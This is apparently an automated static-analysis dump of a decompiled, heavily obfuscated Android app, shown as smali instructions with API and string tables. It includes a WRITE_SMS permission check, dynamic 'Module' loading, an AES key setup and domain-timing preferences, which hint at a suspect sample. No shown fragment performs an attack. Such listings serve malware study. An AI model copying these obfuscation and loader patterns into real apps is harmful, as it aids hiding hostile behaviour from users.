15iget-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->hZyMGHgz:Z
16if-nez v1, :cond_26
17const/4 v1, 0x1
18goto_1b: if-ne v1, p0, :cond_6
19iget-wide v3, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->Odjrct:J
20const-wide/16 v5, 0x0
21cmp-long v1, v3, v5
22if-nez v1, :cond_6
23goto_25: return-object v0
24cond_26: const/4 v1, 0x0
25goto/16 :goto_1b
26cond_28: const/4 v0, 0x0
27goto/16 :goto_25
APIs
  • java.util.concurrent.atomic.AtomicBoolean.get
  • android.os.Handler.postDelayed
Position Instruction Meta Information
1sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ:Ljava/util/concurrent/atomic/AtomicBoolean;
3invoke-virtual {v0}, Ljava/util/concurrent/atomic/AtomicBoolean;->get()Z
4move-result v0
5if-eqz v0, :cond_9
6goto_8: return-void
7cond_9:
8sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ:Ljava/util/concurrent/atomic/AtomicBoolean;
10invoke-virtual {v0}, Ljava/util/concurrent/atomic/AtomicBoolean;->get()Z
11move-result v0
12if-nez v0, :cond_16
14iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/dsMcrI;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
16invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;)V
17cond_16:
18iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/dsMcrI;->DiXsQ:Landroid/os/Handler;
19const-wide/16 v1, 0x190
21invoke-virtual {v0, p0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
22goto/16 :goto_8
APIs
  • java.util.concurrent.atomic.AtomicBoolean.set
  • android.os.Handler.removeCallbacksAndMessages
  • android.content.Context.getApplicationContext
Position Instruction Meta Information
1sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ:Ljava/util/concurrent/atomic/AtomicBoolean;
2const/4 v1, 0x1
4invoke-virtual {v0, v1}, Ljava/util/concurrent/atomic/AtomicBoolean;->set(Z)V
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/iTuIjJC;->DiXsQ:Landroid/os/Handler;
7const/4 v1, 0x0
9invoke-virtual {v0, v1}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
11iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/iTuIjJC;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
13invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;)Landroid/content/Context;
14move-result-object v0
16invoke-virtual {v0}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
17move-result-object v0
18check-cast v0, Landroid/app/Application;
20invoke-static {v0, p0}, Lcom/czybg/eqtbdmzpklrgyns/YAIwLmyd;->Odjrct(Landroid/app/Application;Lcom/czybg/eqtbdmzpklrgyns/FSdEX;)V
21return-void
Cross References
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
Position Instruction Meta Information
1sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
3invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
4move-result-object v1
5cond_6:
6invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
7move-result v0
8if-eqz v0, :cond_19
10invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
11move-result-object v0
12check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
13iget-boolean v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
14if-eqz v2, :cond_6
16iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
17goto_18: return-object v0
18cond_19:
19const-string v0, ""
20goto/16 :goto_18
APIs
  • android.animation.ValueAnimator.getAnimatedValue
  • java.lang.Float.floatValue
  • com.akexorcist.roundcornerprogressbar.RoundCornerProgressBar.setProgress
Position Instruction Meta Information
0.param p1, "animation" # Landroid/animation/ValueAnimator;
1.prologue
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$2;->this$0:Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;
5iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;->progressBar:Lcom/akexorcist/roundcornerprogressbar/RoundCornerProgressBar;
7invoke-virtual {p1}, Landroid/animation/ValueAnimator;->getAnimatedValue()Ljava/lang/Object;
8move-result-object v0
9check-cast v0, Ljava/lang/Float;
11invoke-virtual {v0}, Ljava/lang/Float;->floatValue()F
12move-result v0
14invoke-virtual {v1, v0}, Lcom/akexorcist/roundcornerprogressbar/RoundCornerProgressBar;->setProgress(F)V
15return-void
APIs
  • android.os.Parcel.writeInt
  • android.os.Parcel.writeString
Position Instruction Meta Information
0iget v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->DiXsQ:I
2invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeInt(I)V
4iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->Odjrct:Ljava/lang/String;
6invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeString(Ljava/lang/String;)V
8iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
10invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeString(Ljava/lang/String;)V
11return-void
Cross References
APIs
  • java.lang.Object.<init>
  • android.os.Parcel.readString
  • android.os.Parcel.readInt
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3invoke-virtual {p1}, Landroid/os/Parcel;->readString()Ljava/lang/String;
4move-result-object v0
5iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->LmcGi:Ljava/lang/String;
7invoke-virtual {p1}, Landroid/os/Parcel;->readInt()I
8move-result v0
9iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->hZyMGHgz:I
10return-void
Cross References
APIs
  • java.lang.Object.<init>
  • java.util.ArrayList.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2new-instance v0, Ljava/util/ArrayList;
4invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
5iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/peOiD;->DiXsQ:Ljava/util/List;
6new-instance v0, Ljava/util/ArrayList;
8invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/peOiD;->Odjrct:Ljava/util/List;
10return-void
Cross References
APIs
  • android.os.Parcel.readString
  • java.io.File.<init>
  • android.os.Parcel.readString
Position Instruction Meta Information
1invoke-virtual {p1}, Landroid/os/Parcel;->readString()Ljava/lang/String;
2move-result-object v0
4invoke-direct {p0, v0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
6invoke-virtual {p1}, Landroid/os/Parcel;->readString()Ljava/lang/String;
7move-result-object v0
8iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->Odjrct:Ljava/lang/String;
9return-void
Cross References
APIs
  • com.czybg.eqtbdmzpklrgyns.zlSgts.getAbsolutePath
  • android.os.Parcel.writeString
Position Instruction Meta Information
1invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->getAbsolutePath()Ljava/lang/String;
2move-result-object v0
4invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeString(Ljava/lang/String;)V
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->Odjrct:Ljava/lang/String;
8invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeString(Ljava/lang/String;)V
9return-void
APIs
  • java.lang.IllegalStateException.<init>
Strings
  • Must not use Deprecated methods delay(), disabled(), listener(), pinningInfoProvider() with core()
Position Instruction Meta Information
1iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->coreBuilder:Lmpcom/crashlytics/android/core/CrashlyticsCore$Builder;
2if-eqz v0, :cond_18
4iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
5if-eqz v0, :cond_10
6new-instance v0, Ljava/lang/IllegalStateException;
8const-string v1, "Must not use Deprecated methods delay(), disabled(), listener(), pinningInfoProvider() with core()"
10invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
11throw v0
12cond_10:
13iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->coreBuilder:Lmpcom/crashlytics/android/core/CrashlyticsCore$Builder;
15invoke-virtual {v0}, Lmpcom/crashlytics/android/core/CrashlyticsCore$Builder;->build()Lmpcom/crashlytics/android/core/CrashlyticsCore;
16move-result-object v0
17iput-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
18cond_18:
19iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->answers:Lmpcom/crashlytics/android/answers/Answers;
20if-nez v0, :cond_23
21new-instance v0, Lmpcom/crashlytics/android/answers/Answers;
23invoke-direct {v0}, Lmpcom/crashlytics/android/answers/Answers;-><init>()V
24iput-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->answers:Lmpcom/crashlytics/android/answers/Answers;
25cond_23:
26iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->beta:Lmpcom/crashlytics/android/beta/Beta;
27if-nez v0, :cond_2e
28new-instance v0, Lmpcom/crashlytics/android/beta/Beta;
30invoke-direct {v0}, Lmpcom/crashlytics/android/beta/Beta;-><init>()V
31iput-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->beta:Lmpcom/crashlytics/android/beta/Beta;
32cond_2e:
33iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
34if-nez v0, :cond_39
35new-instance v0, Lmpcom/crashlytics/android/core/CrashlyticsCore;
37invoke-direct {v0}, Lmpcom/crashlytics/android/core/CrashlyticsCore;-><init>()V
38iput-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
39cond_39: new-instance v0, Lmpcom/crashlytics/android/Crashlytics;
41iget-object v1, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->answers:Lmpcom/crashlytics/android/answers/Answers;
43iget-object v2, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->beta:Lmpcom/crashlytics/android/beta/Beta;
45iget-object v3, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
47invoke-direct {v0, v1, v2, v3}, Lmpcom/crashlytics/android/Crashlytics;-><init>(Lmpcom/crashlytics/android/answers/Answers;Lmpcom/crashlytics/android/beta/Beta;Lmpcom/crashlytics/android/core/CrashlyticsCore;)V
48return-object v0
Cross References
APIs
  • android.content.Context.checkCallingOrSelfPermission
Strings
  • android.permission.WRITE_SMS
Position Instruction Meta Information
0const/4 v0, 0x2
1const/4 v1, 0x0
2sget v2, Landroid/os/Build$VERSION;->SDK_INT:I
3const/16 v3, 0x13
4if-ge v2, v3, :cond_9
5goto_8: return v0
6cond_9:
7const-string v2, "android.permission.WRITE_SMS"
9invoke-virtual {p0, v2}, Landroid/content/Context;->checkCallingOrSelfPermission(Ljava/lang/String;)I
10move-result v2
11if-nez v2, :cond_16
12const/4 v2, 0x1
13goto_12: if-nez v2, :cond_18
14move v0, v1
15goto/16 :goto_8
16cond_16: move v2, v1
17goto/16 :goto_12
18cond_18: sget v2, Landroid/os/Build$VERSION;->SDK_INT:I
19const/16 v3, 0x17
20if-lt v2, v3, :cond_8
21move v0, v1
22goto/16 :goto_8
Cross References
APIs
  • android.content.Intent.getIntExtra
Strings
  • _mid_
Position Instruction Meta Information
0const/4 v0, 0x0
2const-string v1, "_mid_"
3const/4 v2, 0x0
5invoke-virtual {p1, v1, v2}, Landroid/content/Intent;->getIntExtra(Ljava/lang/String;I)I
6move-result v1
7if-nez v1, :cond_b
8goto_a: return-object v0
9cond_b: new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
11invoke-direct {v2, p0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;-><init>(Landroid/content/Context;)V
13invoke-virtual {v2, p0, v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Landroid/content/Context;I)Lcom/czybg/eqtbdmzpklrgyns/Module;
14try_end_13: move-result-object v0
15goto/16 :goto_a
16catch_15: move-exception v1
17goto/16 :goto_a
APIs
  • android.app.Activity.onBackPressed
Strings
  • onBackPressed
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onBackPressed()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onBackPressed"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
APIs
  • android.app.Activity.onDestroy
Strings
  • onDestroy
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onDestroy()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onDestroy"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
APIs
  • android.app.Activity.onPause
Strings
  • onPause
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onPause()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onPause"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
APIs
  • android.app.Activity.onRestart
Strings
  • onRestart
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onRestart()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onRestart"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
APIs
  • android.app.Activity.onResume
Strings
  • onResume
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onResume()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onResume"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
APIs
  • android.app.Activity.onStart
Strings
  • onStart
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onStart()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onStart"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
APIs
  • android.app.Activity.onStop
Strings
  • onStop
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onStop()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onStop"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
APIs
  • android.app.Activity.onUserLeaveHint
Strings
  • onUserLeaveHint
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onUserLeaveHint()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
4if-eqz v0, :cond_e
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
8const-string v1, "onUserLeaveHint"
10invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
11cond_e: return-void
Cross References
APIs
  • java.lang.IllegalStateException.<init>
Strings
  • Crashlytics must be initialized by calling Fabric.with(Context) prior to calling Crashlytics.getInstance()
Position Instruction Meta Information
1invoke-static {}, Lmpcom/crashlytics/android/Crashlytics;->getInstance()Lmpcom/crashlytics/android/Crashlytics;
2move-result-object v0
3if-nez v0, :cond_e
4new-instance v0, Ljava/lang/IllegalStateException;
6const-string v1, "Crashlytics must be initialized by calling Fabric.with(Context) prior to calling Crashlytics.getInstance()"
8invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
9throw v0
10cond_e: return-void
Cross References
APIs
  • java.lang.String.split
Strings
  • :
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->LmcGi:Ljava/lang/String;
3const-string v1, ":"
5invoke-virtual {v0, v1}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
6move-result-object v0
7const/4 v1, 0x0
8aget-object v0, v0, v1
9return-object v0
Cross References
APIs
  • android.content.SharedPreferences.getLong
Strings
  • noActiveDomainTime
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ:Landroid/content/SharedPreferences;
3const-string v1, "noActiveDomainTime"
4const-wide/16 v2, 0x0
6invoke-interface {v0, v1, v2, v3}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J
7move-result-wide v0
8return-wide v0
Cross References
APIs
  • javax.crypto.spec.SecretKeySpec.<init>
Strings
  • AES
Position Instruction Meta Information
0new-instance v0, Ljavax/crypto/spec/SecretKeySpec;
2const-string v1, "AES"
4invoke-direct {v0, p1, v1}, Ljavax/crypto/spec/SecretKeySpec;-><init>([BLjava/lang/String;)V
6invoke-direct {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;-><init>(Ljava/security/Key;)V
7return-void
APIs
  • java.lang.String.getBytes
Strings
  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Position Instruction Meta Information
1const-string v0, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
3invoke-virtual {v0}, Ljava/lang/String;->getBytes()[B
4move-result-object v0
5sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/jVOak;->DiXsQ:[B
6return-void
APIs
  • java.text.SimpleDateFormat.<init>
Strings
  • yyyy-MM-dd\'T\'HH:mm:ssZ
Position Instruction Meta Information
0new-instance v0, Ljava/text/SimpleDateFormat;
2const-string v1, "yyyy-MM-dd\'T\'HH:mm:ssZ"
4invoke-direct {v0, v1}, Ljava/text/SimpleDateFormat;-><init>(Ljava/lang/String;)V
5sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->xnLvoQ:Ljava/text/SimpleDateFormat;
6return-void
Cross References
APIs
  • java.util.ArrayList.add
  • android.app.Application.registerActivityLifecycleCallbacks
Position Instruction Meta Information
0sget-boolean v0, Lcom/czybg/eqtbdmzpklrgyns/YAIwLmyd;->DiXsQ:Z
1if-eqz v0, :cond_15
3invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;
4move-result-object v0
6iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
7monitor-enter v1
8try_start_b:
9iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
11invoke-virtual {v0, p1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
12monitor-exit v1
13goto_11: return-void
14catchall_12: move-exception v0
15monitor-exit v1
16try_end_14: throw v0
17cond_15: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/DnJoHAWQ;
19invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/DnJoHAWQ;-><init>(Lcom/czybg/eqtbdmzpklrgyns/FSdEX;)V
21invoke-virtual {p0, v0}, Landroid/app/Application;->registerActivityLifecycleCallbacks(Landroid/app/Application$ActivityLifecycleCallbacks;)V
22goto/16 :goto_11
Cross References
APIs
  • java.util.ArrayList.remove
  • android.app.Application.unregisterActivityLifecycleCallbacks
Position Instruction Meta Information
0sget-boolean v0, Lcom/czybg/eqtbdmzpklrgyns/YAIwLmyd;->DiXsQ:Z
1if-eqz v0, :cond_15
3invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;
4move-result-object v0
6iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
7monitor-enter v1
8try_start_b:
9iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
11invoke-virtual {v0, p1}, Ljava/util/ArrayList;->remove(Ljava/lang/Object;)Z
12monitor-exit v1
13goto_11: return-void
14catchall_12: move-exception v0
15monitor-exit v1
16try_end_14: throw v0
17cond_15: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/DnJoHAWQ;
19invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/DnJoHAWQ;-><init>(Lcom/czybg/eqtbdmzpklrgyns/FSdEX;)V
21invoke-virtual {p0, v0}, Landroid/app/Application;->unregisterActivityLifecycleCallbacks(Landroid/app/Application$ActivityLifecycleCallbacks;)V
22goto/16 :goto_11
Cross References
APIs
  • android.os.Handler.removeCallbacksAndMessages
  • android.os.Handler.post
Position Instruction Meta Information
0monitor-enter p0
1const/4 v0, 0x1
2try_start_2: iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ:Z
4iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->IwTvjRW:Landroid/os/Handler;
5const/4 v1, 0x0
7invoke-virtual {v0, v1}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
9iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->IwTvjRW:Landroid/os/Handler;
11iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->ciatqPxI:Ljava/lang/Runnable;
13invoke-virtual {v0, v1}, Landroid/os/Handler;->post(Ljava/lang/Runnable;)Z
15invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->LmcGi()V
16try_end_14: monitor-exit p0
17return-void
18catchall_16: move-exception v0
19monitor-exit p0
20throw v0
Cross References
APIs
  • java.util.Arrays.asList
  • java.util.Collections.unmodifiableCollection
Position Instruction Meta Information
1invoke-direct {p0}, Lmpio/fabric/sdk/android/Kit;-><init>()V
2iput-object p1, p0, Lmpcom/crashlytics/android/Crashlytics;->answers:Lmpcom/crashlytics/android/answers/Answers;
3iput-object p2, p0, Lmpcom/crashlytics/android/Crashlytics;->beta:Lmpcom/crashlytics/android/beta/Beta;
4iput-object p3, p0, Lmpcom/crashlytics/android/Crashlytics;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
5const/4 v0, 0x3
6new-array v0, v0, [Lmpio/fabric/sdk/android/Kit;
7const/4 v1, 0x0
8aput-object p1, v0, v1
9const/4 v1, 0x1
10aput-object p2, v0, v1
11const/4 v1, 0x2
12aput-object p3, v0, v1
14invoke-static {v0}, Ljava/util/Arrays;->asList([Ljava/lang/Object;)Ljava/util/List;
15move-result-object v0
17invoke-static {v0}, Ljava/util/Collections;->unmodifiableCollection(Ljava/util/Collection;)Ljava/util/Collection;
18move-result-object v0
19iput-object v0, p0, Lmpcom/crashlytics/android/Crashlytics;->kits:Ljava/util/Collection;
20return-void
Cross References
APIs
  • java.util.ArrayList.size
  • java.util.ArrayList.toArray
Position Instruction Meta Information
0const/4 v0, 0x0
2iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
3monitor-enter v1
4try_start_4:
5iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
7invoke-virtual {v2}, Ljava/util/ArrayList;->size()I
8move-result v2
9if-lez v2, :cond_12
11iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
13invoke-virtual {v0}, Ljava/util/ArrayList;->toArray()[Ljava/lang/Object;
14move-result-object v0
15cond_12: monitor-exit v1
16return-object v0
17catchall_14: move-exception v0
18monitor-exit v1
19try_end_16: throw v0
Cross References
APIs
  • java.util.Random.<init>
  • java.util.Random.nextInt
Position Instruction Meta Information
0new-instance v1, Ljava/util/Random;
2invoke-direct {v1}, Ljava/util/Random;-><init>()V
3new-array v2, p0, [B
4const/4 v0, 0x0
5goto_8: if-ge v0, p0, :cond_1a
7sget-object v3, Lcom/czybg/eqtbdmzpklrgyns/jVOak;->DiXsQ:[B
9sget-object v4, Lcom/czybg/eqtbdmzpklrgyns/jVOak;->DiXsQ:[B
10array-length v4, v4
12invoke-virtual {v1, v4}, Ljava/util/Random;->nextInt(I)I
13move-result v4
14aget-byte v3, v3, v4
15aput-byte v3, v2, v0
16add-int/lit8 v0, v0, 0x1
17goto/16 :goto_8
18cond_1a: return-object v2
Strings
  • Crashlytics
  • Use of Crashlytics.getDebugMode is deprecated.
Position Instruction Meta Information
0.annotation runtime Ljava/lang/Deprecated;
1.end annotation
3invoke-static {}, Lmpio/fabric/sdk/android/Fabric;->getLogger()Lmpio/fabric/sdk/android/Logger;
4move-result-object v0
6const-string v1, "Crashlytics"
8const-string v2, "Use of Crashlytics.getDebugMode is deprecated."
10invoke-interface {v0, v1, v2}, Lmpio/fabric/sdk/android/Logger;->w(Ljava/lang/String;Ljava/lang/String;)V
12invoke-virtual {p0}, Lmpcom/crashlytics/android/Crashlytics;->getFabric()Lmpio/fabric/sdk/android/Fabric;
14invoke-static {}, Lmpio/fabric/sdk/android/Fabric;->isDebuggable()Z
15move-result v0
16return v0
Cross References
APIs
  • android.os.Parcel.readByte
  • android.os.Parcel.readInt
Position Instruction Meta Information
1invoke-direct {p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;-><init>(Landroid/os/Parcel;)V
3invoke-virtual {p1}, Landroid/os/Parcel;->readByte()B
4move-result v0
5if-eqz v0, :cond_13
6const/4 v0, 0x1
7goto_a: iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->DiXsQ:Z
9invoke-virtual {p1}, Landroid/os/Parcel;->readInt()I
10move-result v0
11iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->Odjrct:I
12return-void
13cond_13: const/4 v0, 0x0
14goto/16 :goto_a
Cross References
APIs
  • java.io.InputStream.read
  • java.io.OutputStream.write
Position Instruction Meta Information
0sget v0, Lcom/czybg/eqtbdmzpklrgyns/hZyMGHgz;->DiXsQ:I
1mul-int/lit8 v2, v0, 0x4
